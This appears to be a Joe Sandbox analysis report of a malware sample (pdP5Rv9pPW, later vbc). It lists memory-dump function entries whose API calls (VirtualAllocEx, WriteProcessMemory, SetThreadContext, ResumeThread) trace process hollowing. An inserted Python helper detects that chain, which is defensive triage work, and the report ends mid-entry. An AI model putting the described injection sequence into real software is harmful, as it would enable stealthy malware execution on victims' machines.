                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.374211806.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d50000_pdP5Rv9pPW.jbxd
                                                              Similarity
                                                              • API ID: CreateProcessUser
                                                              • String ID:
                                                              • API String ID: 2217836671-0
                                                              • Opcode ID: 3035c9768e64a7384c8bf9820f0408273756ec9eb90f1438ba62cca404b4e165
                                                              • Instruction ID: c739b88ca53d92d79460d4b67fcfe5d7dac240b589b603ab1ff426bbb7cef65e
                                                              • Opcode Fuzzy Hash: 3035c9768e64a7384c8bf9820f0408273756ec9eb90f1438ba62cca404b4e165
                                                              • Instruction Fuzzy Hash: 1BA13971E002199FDF10CF68C9817EDBBB2EB49315F048169EC19EB291DB749989CF92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.380895325.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4ed0000_pdP5Rv9pPW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d3de59ba780a4f3bd58b43f4fd68f6d71cd452d89bf2175e481cc8ec3ba661cd
                                                              • Instruction ID: 3a5749201b7b3cb02d0603add573772fd1fa40ccb2b3db00f51d8e34af99fd8d
                                                              • Opcode Fuzzy Hash: d3de59ba780a4f3bd58b43f4fd68f6d71cd452d89bf2175e481cc8ec3ba661cd
                                                              • Instruction Fuzzy Hash: F2F26F70E45228CFCB19EF29E98969CBBB1FB49301F0085E9D488A7754DB346E88CF55
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.380942576.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4ee0000_pdP5Rv9pPW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 72106d0aa57f59042ba66e49c9d7cb6d1eacf4be6438cab02bebb52fa095cd49
                                                              • Instruction ID: 7879dde26b392d3b25afe8e77ecabb240a49b79dd9d5571181fa4d7458f757c4
                                                              • Opcode Fuzzy Hash: 72106d0aa57f59042ba66e49c9d7cb6d1eacf4be6438cab02bebb52fa095cd49
                                                              • Instruction Fuzzy Hash: 47E25070E44128CFCB58EF2AE9856ADBBB1FB49301F0045EAD488A7755DB346E88CF45
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Rendered graph omitted. Function 27d0394-27d03fb: ten small basic blocks forming three two-way branches in sequence, no calls.
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.374552667.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_27d0000_pdP5Rv9pPW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: xql$xql
                                                              • API String ID: 0-2396326202
                                                              • Opcode ID: 5226fb1ba8c08546ce7b889373262d5c50affd561dff4ea7ef71fa8bb0f7a22f
                                                              • Instruction ID: d6071f83c8cd151edfdafdbd9872ae44bc4d58d43ffeba5cf759b8ad9343ad04
                                                              • Opcode Fuzzy Hash: 5226fb1ba8c08546ce7b889373262d5c50affd561dff4ea7ef71fa8bb0f7a22f
                                                              • Instruction Fuzzy Hash: 6CF0A421B0D3924FC727462C581116E7B721ED3114B1D42FBC881DFB96DA308C4AC3A7
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Rendered graph omitted. Function 27d0257-27d02b3: ten small basic blocks forming three two-way branches in sequence, no calls.
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.374552667.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_27d0000_pdP5Rv9pPW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: xql$xql
                                                              • API String ID: 0-2396326202
                                                              • Opcode ID: f910e5f0b5ff1eeaa6fbb10dd4a4ccc1269cc14cc2e2b21a959493e9bac69f12
                                                              • Instruction ID: 8ec861bb83c52e01714ab2b8650f2bd7e814f5fe7b638143e4df5fe198d8c4df
                                                              • Opcode Fuzzy Hash: f910e5f0b5ff1eeaa6fbb10dd4a4ccc1269cc14cc2e2b21a959493e9bac69f12
                                                              • Instruction Fuzzy Hash: 4AF09021B0E3924FD767426C492427B7BB24FC7220B1E82FA8481CBA55DA359C42C3A7
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Rendered graph omitted. Function 4ebc3f2-4ebc7bc: five basic blocks; the block 4ebc759-4ebc792 that calls WriteProcessMemory is reached on both paths out of the entry block, so the call is unconditional once the function is entered; the return value is tested at 4ebc794-4ebc79a before the exit block 4ebc79b-4ebc7bc.
                                                              APIs
                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04EBC785
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.380751416.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4eb0000_pdP5Rv9pPW.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: 3d247583952612620904c7b6b3065b94fcca794d95c3ae367380e11b88a6ccbc
                                                              • Instruction ID: 744408dc261c2f35f7f7bb41e8f78a849bd75e37af3355e62f4c6645cad20065
                                                              • Opcode Fuzzy Hash: 3d247583952612620904c7b6b3065b94fcca794d95c3ae367380e11b88a6ccbc
                                                              • Instruction Fuzzy Hash: AB3166B19043889FCB01CFA9C884BDEBBF4EF4A314F14846AE858A7251D338A545CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.380751416.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4eb0000_pdP5Rv9pPW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e05ac67cf9b24668d6d9d70618a7b9c18d9609532dd7d224e7164670a4327bd0
                                                              • Instruction ID: 3f6cf0436fe00195ed8e02c227a12ca75f0ee831c67f603880060e2d6a432283
                                                              • Opcode Fuzzy Hash: e05ac67cf9b24668d6d9d70618a7b9c18d9609532dd7d224e7164670a4327bd0
                                                              • Instruction Fuzzy Hash: 7E41E6B180D3889FCB02DF68C954ADEBFF0AF4A314F05449BD495E7292D734A944CBA6
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04EBC785
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.380751416.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4eb0000_pdP5Rv9pPW.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: 94193da8f51d97ae68aa3c9544cfcb8bc4544ce50e313bf9b056b0ca5ad4be25
                                                              • Instruction ID: 629c03fb587104880c33e8df8d3d2bdb38f8b6f24f4110f952dd31085c90d9a1
                                                              • Opcode Fuzzy Hash: 94193da8f51d97ae68aa3c9544cfcb8bc4544ce50e313bf9b056b0ca5ad4be25
                                                              • Instruction Fuzzy Hash: AA21E6B5900359DFDB10CFAAC885BDEBBF4FF49314F10842AE958A7240D774A554CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • SetThreadContext.KERNELBASE(?,00000000), ref: 00D5FDAF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.374211806.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d50000_pdP5Rv9pPW.jbxd
                                                              Similarity
                                                              • API ID: ContextThread
                                                              • String ID:
                                                              • API String ID: 1591575202-0
                                                              • Opcode ID: c046ac4265a72a62d3449fbb102ee30f154474cdc661cd4adff923c927e18ffa
                                                              • Instruction ID: 7a92ef6a18166cff7cf874f2f2570f198e0999025f7075ee839f26e145296c2e
                                                              • Opcode Fuzzy Hash: c046ac4265a72a62d3449fbb102ee30f154474cdc661cd4adff923c927e18ffa
                                                              • Instruction Fuzzy Hash: 482117B1D002199FCB10CF9AC9857DEFBF4FB49325F14812AE818A7340D778A9448FA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00D5FE6E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.374211806.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d50000_pdP5Rv9pPW.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessRead
                                                              • String ID:
                                                              • API String ID: 1726664587-0
                                                              • Opcode ID: 256150a304436010335843aeb9372eb233c0f03c68e23727f2b901f3dce0379f
                                                              • Instruction ID: e0aadd8a8ce3e7504865db15731611df2e10881105b47dd7805e0818440d9bbd
                                                              • Opcode Fuzzy Hash: 256150a304436010335843aeb9372eb233c0f03c68e23727f2b901f3dce0379f
                                                              • Instruction Fuzzy Hash: F021EAB1900259DFCB10CF9AC944BDEFBF4FB48324F148429E958A7251D774A954CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00D5FF23
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.374211806.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d50000_pdP5Rv9pPW.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: a83552ab9a415a2388b291ab5350eb82471ba51e49f5038439af43ec0bb9b5d3
                                                              • Instruction ID: 650ea2066af750183d291dcafd424f1cff4f53f7306d1c62fb7d528d05fd805d
                                                              • Opcode Fuzzy Hash: a83552ab9a415a2388b291ab5350eb82471ba51e49f5038439af43ec0bb9b5d3
                                                              • Instruction Fuzzy Hash: 581125B5800249DFCB10CF9AC884BDEBBF4FF49324F148419E928A7250C375A944CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.380751416.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4eb0000_pdP5Rv9pPW.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: f886d855139ce12e2661947abf97167068cf10590af09b67a293edba5d5d7441
                                                              • Instruction ID: 8894900a1991730414a8aafea6f9d867a3f0c957ce571381b1f703a0d8c62d59
                                                              • Opcode Fuzzy Hash: f886d855139ce12e2661947abf97167068cf10590af09b67a293edba5d5d7441
                                                              • Instruction Fuzzy Hash: AA1136B1C00258CFDB20CFA9D488BDEBFF4EB49324F20845AD469A7240C374A945CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.380751416.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4eb0000_pdP5Rv9pPW.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: a798fa1d0c57a81c54bd89c216375a6514b011488074ba4fd55698cb46b5b6c8
                                                              • Instruction ID: 63ae71d511a26f2ab1ee191848863486ae41bc3d6fd627023731fc028d453215
                                                              • Opcode Fuzzy Hash: a798fa1d0c57a81c54bd89c216375a6514b011488074ba4fd55698cb46b5b6c8
                                                              • Instruction Fuzzy Hash: 3E1123B1800258CFDB10CF9AC588BDFFBF4EB89324F20841AD958A7240C774A944CFA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%
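Read together, the API-bearing entries on this page enumerate, one function at a time, the primitives of a process-hollowing chain: CreateProcessAsUserA (region D50000), VirtualAllocEx, ReadProcessMemory and SetThreadContext (D50000), WriteProcessMemory (4EB0000) and ResumeThread (4EB0000), all in dump regions reported as "based on PE: false", that is, not backed by a mapped image. The Python below is an added triage helper, not Joe Sandbox code and not part of this report: it parses entries of this shape, pulls out each function's API calls and dump region, and checks whether every stage of the chain is present. The trimmed entry layout, the two constructed report excerpts, and the word-set matching against Joe's reordered API ID labels (MemoryProcessWrite for WriteProcessMemory, ContextThread for SetThreadContext) are assumptions made for illustration.

```python
"""Triage helper for Joe Sandbox per-function entries: collect the API calls
and test them against the process-hollowing chain. Added example; not Joe
Sandbox code. Entry layout and both sample excerpts are assumptions."""
import re

# Constructed excerpt, trimmed to the lines the parser needs, in the shape of
# the entries on this page. The last entry has an empty APIs block and only
# Joe's reordered "API ID" label, as the ResumeThread entries do on the page.
SAMPLE_REPORT = """\
APIs
• CreateProcessAsUserA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?), ref: 00D5FBF8
• Source File: 00000000.00000002.374211806.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
Uniqueness Score: -1.00%
APIs
• WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04EBC785
• Source File: 00000000.00000002.380751416.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
Uniqueness Score: -1.00%
APIs
• SetThreadContext.KERNELBASE(?,00000000), ref: 00D5FDAF
• Source File: 00000000.00000002.374211806.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
Uniqueness Score: -1.00%
APIs
• ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00D5FE6E
• Source File: 00000000.00000002.374211806.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
Uniqueness Score: -1.00%
APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00D5FF23
• Source File: 00000000.00000002.374211806.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
Uniqueness Score: -1.00%
APIs
• Source File: 00000000.00000002.380751416.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
• API ID: ResumeThread
Uniqueness Score: -1.00%
"""

# Constructed negative case: a debugger-like tool that only reads and writes
# another process's memory, with no process creation or thread control.
BENIGN_REPORT = """\
APIs
• ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00401A10
• Source File: constructed.sdmp, Offset: 00400000, based on PE: true
Uniqueness Score: 0.00%
APIs
• WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 00401B44
• Source File: constructed.sdmp, Offset: 00400000, based on PE: true
Uniqueness Score: 0.00%
"""

ENTRY_SPLIT = re.compile(r"^Uniqueness Score:.*$", re.M)
API_CALL = re.compile(r"^• (\w+)\.\w+\(.*?\), ref: ([0-9A-Fa-f]+)\s*$", re.M)
OFFSET = re.compile(r"Offset: ([0-9A-Fa-f]+)")
API_ID = re.compile(r"^• API ID: (\S+)", re.M)

# Each stage is the set of CamelCase words that must appear in the API name.
# Matching on words tolerates A/W/Ex suffixes and Joe's alphabetically
# reordered API ID labels (assumed from the entries on this page).
HOLLOWING_STAGES = {
    "create_process": {"Create", "Process"},
    "remote_alloc": {"Virtual", "Alloc"},      # also hits local VirtualAlloc
    "remote_write": {"Write", "Process", "Memory"},
    "thread_context": {"Thread", "Context"},   # Get or Set
    "resume_thread": {"Resume", "Thread"},
}


def parse_entries(text):
    """Split the report into function entries: dump region plus API calls."""
    entries = []
    for chunk in ENTRY_SPLIT.split(text):
        if not chunk.strip():
            continue
        m = OFFSET.search(chunk)
        region = m.group(1).upper() if m else None
        calls = [(name, ref.upper()) for name, ref in API_CALL.findall(chunk)]
        if not calls:
            # No explicit APIs line: fall back to the API ID label, no ref address.
            calls = [(label, None) for label in API_ID.findall(chunk)]
        entries.append({"region": region, "calls": calls})
    return entries


def words(api_name):
    return set(re.findall(r"[A-Z][a-z]*", api_name))


def assess(entries):
    """Map every call onto a hollowing stage; verdict requires all five stages."""
    found = {}
    for entry in entries:
        for name, ref in entry["calls"]:
            w = words(name)
            for stage, needed in HOLLOWING_STAGES.items():
                if needed <= w:
                    found.setdefault(stage, []).append((name, entry["region"], ref))
    missing = [s for s in HOLLOWING_STAGES if s not in found]
    regions = sorted({r for hits in found.values() for _, r, _ in hits if r})
    return {"stages": found, "missing": missing, "regions": regions,
            "hollowing": not missing}


if __name__ == "__main__":
    for label, text in (("pdP5Rv9pPW.exe excerpt", SAMPLE_REPORT),
                        ("benign excerpt", BENIGN_REPORT)):
        v = assess(parse_entries(text))
        print(label, "->", "hollowing chain complete across " + ", ".join(v["regions"])
              if v["hollowing"] else "missing " + ", ".join(v["missing"]))
```

Any single stage is weak evidence on its own (the remote_alloc key also matches a local VirtualAlloc, and ReadProcessMemory is deliberately not a stage because debuggers and crash handlers use it), so the verdict only fires when the full chain is present. The region list is worth reporting alongside the verdict: here the chain is split between two regions with no PE backing, which is consistent with the report's dotNetProtector finding, the injector being unpacked into dynamically allocated memory rather than shipped as a mapped module.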

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.374552667.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_27d0000_pdP5Rv9pPW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: xql
                                                              • API String ID: 0-109062218
                                                              • Opcode ID: b1bdd58e714827db0ca162d204d86ce22f31570522808cb11fabc95458484706
                                                              • Instruction ID: 5ec5d1f823bd693ec8cac762ce1a8757fa89ea976f236bb19c9e5cdb23a0627a
                                                              • Opcode Fuzzy Hash: b1bdd58e714827db0ca162d204d86ce22f31570522808cb11fabc95458484706
                                                              • Instruction Fuzzy Hash: E5F0961170E2D04FC753423C28201593FA14F87114B4E01EBD480CB786CA588C05C3A7
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.374552667.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_27d0000_pdP5Rv9pPW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 30caa5224b984e0c2fd9c6eb4129b2106d0a2f2f6a21c5ba7fc625c6cae885ef
                                                              • Instruction ID: ed9c7b9f2ab6044103ec775cd7d24a9b29ade23e2d9b7ff5650bd72fb48db952
                                                              • Opcode Fuzzy Hash: 30caa5224b984e0c2fd9c6eb4129b2106d0a2f2f6a21c5ba7fc625c6cae885ef
                                                              • Instruction Fuzzy Hash: 9D21F631708216AFDB218E858942B6F7776AB96310F294029FD055B741CB31DC11C7A2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%
                                                              • Opcode ID: b72ad92a852f8b35c35b491e740ceee09fd786d57ab15facd78aa5c287fbdb10
                                                              • Instruction ID: e0a8e3b22eb2b44af3ae8b72b2ec864bd43530dc0c98d6fa81509b6fdac92481
                                                              • Opcode Fuzzy Hash: b72ad92a852f8b35c35b491e740ceee09fd786d57ab15facd78aa5c287fbdb10
                                                              • Instruction Fuzzy Hash: 91E0C239F005358B4718DA4E8510556BBAAAFC922071CA0B5E90DCB732DE30DC008781
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.374552667.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_27d0000_pdP5Rv9pPW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e97a09f1ccb403504892dc24c664b143787826f5cc2947c1983528b17338080c
                                                              • Instruction ID: 5c857761adc42018e6172e668746bdbeebed5fdd50a101ce1705831bdcbe3a0c
                                                              • Opcode Fuzzy Hash: e97a09f1ccb403504892dc24c664b143787826f5cc2947c1983528b17338080c
                                                              • Instruction Fuzzy Hash: 23E0EC6064E3C04FDB474B705C246A47F715D8721071E00EAD0C6CF2A3DD694455D72A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.374552667.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_27d0000_pdP5Rv9pPW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0f7106893537e588586e6323c4e3e4961062417cdf9b51ce35cd4941c78516b7
                                                              • Instruction ID: 74fdfd9dceacf889b1c9791dce8c5b7a3b0d5e362752e2d0f497e9a29c52e0ed
                                                              • Opcode Fuzzy Hash: 0f7106893537e588586e6323c4e3e4961062417cdf9b51ce35cd4941c78516b7
                                                              • Instruction Fuzzy Hash: C7D05E34F44509CF5B548629C51282977F66FC52287185064D1068FB20EF30E8408682
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.374552667.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_27d0000_pdP5Rv9pPW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 05e78bc037c8a9896c7e50de28e0c71cf58caf196befabdb251ea820ee94b853
                                                              • Instruction ID: e60ce73401a4b2deb502805682e7eddbaedab70a5be3aecc354610613da1ac87
                                                              • Opcode Fuzzy Hash: 05e78bc037c8a9896c7e50de28e0c71cf58caf196befabdb251ea820ee94b853
                                                              • Instruction Fuzzy Hash: 46D0C734B042528A5B196565455117A33637BD31153FD40BA84065EF55CE369842E256
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.374552667.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_27d0000_pdP5Rv9pPW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1d92bed0078d6cb1700753df90ba9be0c767a045d8a790ef89fcd82ff2a5d4ad
                                                              • Instruction ID: 87902e377b526a6ff93fa40c02a1bd30a5d042e7c76538e852aff6465f582d23
                                                              • Opcode Fuzzy Hash: 1d92bed0078d6cb1700753df90ba9be0c767a045d8a790ef89fcd82ff2a5d4ad
                                                              • Instruction Fuzzy Hash: 32D0A734F88945CFDB14C629C052C287FB27F86214B1850ADE446DBA31D7319400CB01
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.374552667.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_27d0000_pdP5Rv9pPW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 850c4b7070b106010cbeab75b1b0df1d78d14d1a6672e2f93ff262af4032b9b9
                                                              • Instruction ID: 1c4a4609ce08a3ccb5963d29881a55d137eb329ba2768741592514ee5fbc96a5
                                                              • Opcode Fuzzy Hash: 850c4b7070b106010cbeab75b1b0df1d78d14d1a6672e2f93ff262af4032b9b9
                                                              • Instruction Fuzzy Hash: EAB01230144B4C9FA781735434456D47F0CD407400B8900C0F08C83511CE90944249E6
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.374552667.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_27d0000_pdP5Rv9pPW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1cbfe5e27f7508562575549767d8b41676e009bf0f2911160458435bc540e2b2
                                                              • Instruction ID: 6964ae809d27c337135a50f52d506a8297f2196f439e5b4016065098d92b979f
                                                              • Opcode Fuzzy Hash: 1cbfe5e27f7508562575549767d8b41676e009bf0f2911160458435bc540e2b2
                                                              • Instruction Fuzzy Hash: 4C90223000030C8B8200B38038083803B0CA008000B800000B00C802008EE0A00000A0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.380799620.0000000004EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4ec0000_pdP5Rv9pPW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6e6f606cce7badbc81721e09353d0dc221350042136e97d74c39c3ee770d8da2
                                                              • Instruction ID: 9544eb5c89333b392d49bcf5a2ecf5e26ca653ba783d3bb7e738958fce410084
                                                              • Opcode Fuzzy Hash: 6e6f606cce7badbc81721e09353d0dc221350042136e97d74c39c3ee770d8da2
                                                              • Instruction Fuzzy Hash: 61A35D70E441288FC759EF29E9856ACBBB2FB49301F0045EAD48CA7755DB386E88CF45
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.380992110.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4ef0000_pdP5Rv9pPW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e21ec41e4180750a5525093fa97d1ccae2169fda16ad32f24b9a446e7fd1f47a
                                                              • Instruction ID: 1fdf458a824db358b78d6654b763fb723c9c79ffb4367caf9c42b25f36d6da4a
                                                              • Opcode Fuzzy Hash: e21ec41e4180750a5525093fa97d1ccae2169fda16ad32f24b9a446e7fd1f47a
                                                              • Instruction Fuzzy Hash: 9B934E70E042288FCB19EF29D9856ADBBB2FB89305F0045E9D48CA7755DB346E88CF45
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Execution Graph

                                                              Execution Coverage: 31.9%
                                                              Dynamic/Decrypted Code Coverage: 100%
                                                              Signature Coverage: 4.3%
                                                              Total number of Nodes: 163
                                                              Total number of Limit Nodes: 9
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.548516227.000000000A3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A3F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_a3f0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 4be23331a25445450168c685196d6abd278ee52b15a4ed8a031f268dc805940a
                                                              • Instruction ID: d58a642c38fd74be8b87ba7a491bee976125243c439c4afa72eeebadd7a61836
                                                              • Opcode Fuzzy Hash: 4be23331a25445450168c685196d6abd278ee52b15a4ed8a031f268dc805940a
                                                              • Instruction Fuzzy Hash: F451AF70A002099FCB04EFB0D959AAEB7E5FF85304F048969E6129B391DF34ED05CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetUserNameW.ADVAPI32(00000000,00000000), ref: 09EE55B3
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: NameUser
                                                              • String ID:
                                                              • API String ID: 2645101109-0
                                                              • Opcode ID: 2f361984e5b74b9c09e0a482c5de1e076561dbc7a593a5785181f191861e0529
